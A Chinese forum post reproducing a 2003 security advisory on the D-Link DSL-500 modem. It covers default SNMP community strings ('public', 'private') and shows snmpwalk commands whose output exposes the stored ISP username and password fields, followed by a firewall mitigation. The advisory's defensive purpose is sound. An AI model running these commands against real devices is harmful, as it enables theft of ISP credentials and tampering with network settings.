找回密码
 立即注册
搜索
查看: 249|回复: 0

D-Link DSL 宽带Modem/路由器存在安全缺陷 (Hardware,缺陷)

[复制链接]

209

主题

857

回帖

1676

积分

金牌会员

积分
1676
发表于 2003-3-29 17:31:15 | 显示全部楼层 |阅读模式
涉及程序:
D-Link DSL 宽带Modem/路由器 DSL-500  
  
描述:
D-Link DSL 宽带Modem/路由器存在安全缺陷
  
详细:
D-Link DSL 宽带 Modem DSL-500存在多个安全缺陷:
1、 缺省安装的路由器允许SNMP(Simple Network Management Protocol)服务器使用缺省社团名来获得读和读/写权限。DSL-500 modem配置成允许WAN/LAN/Internet通过SNMP进行访问。
andrei@whale:~/bugtraq/DSL-modems$ snmpwalk -Os -c
public 192.168.0.1 -v 1
sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30
Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk
Copyright (c) 2000 Dlink Corp.
sysObjectID.0 = OID: enterprises.171.10.30.1
sysUpTime.0 = Timeticks: (14246347) 1 day, 15:34:23.47
...
...
社团名:public
允许远程访问设备,允许例举和收集敏感的网络信息。

社团名:private
在设备上有读/写权限,导致攻击者能够更改宽带modem的网络设置。

本地/远程恶意攻击者能利用该缺陷获得/更改宽带modem的网络设置。


2、ISP帐户信息包含注册名和密码,并保存在modem中,攻击者利用SNMP收集效用(例如snmpwalk)能获得这些信息:
andrei@whale:~/bugtraq/DSL-modems$ snmpwalk -Os -c
public 192.168.0.1 -v 1
sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30
Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk
...
...
...
transmission.23.2.3.1.5.2.1 = STRING:
"username@dsl-provider"
...
...
transmission.23.2.3.1.6.2.1 = STRING: "password-string"
...
...
...

本地/远程攻击者能使用该缺陷获得机密信息。
  
攻击方法:
暂无有效攻击代码
  
解决方案:
目前厂商未公布该缺陷补丁,请用户及时关注厂商站点:
http://www.dlink.com/

临时解决方案:
通过防火墙管理LAN/WAN的UDP 161端口,不会使WEB管理界面的SNMP服务失效。

  
附加信息:

  
发布时间:2003年3月28日
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|海浩社区

GMT+8, 2025-9-21 13:33 , Processed in 0.071935 second(s), 20 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表